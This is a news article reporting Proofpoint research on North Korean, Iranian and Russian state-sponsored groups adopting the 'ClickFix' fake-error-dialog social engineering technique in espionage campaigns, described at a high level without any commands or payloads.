State-sponsored cyber groups are flocking to the ‘ClickFix’ social engineering technique
State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster – but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea’s TA457, Iran’s TA450, and Russia’s UNK_RemoteRogue and TA422 have all been making use of it.
“This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution,” said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it’s currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea’s TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran’s TA450, meanwhile, used an attacker-controlled email address – support@microsoftonlines[.]com – to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, however, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
“Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations,” said the firm.
“However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time.”
MORE FROM ITPRO
TOPICS
Source link
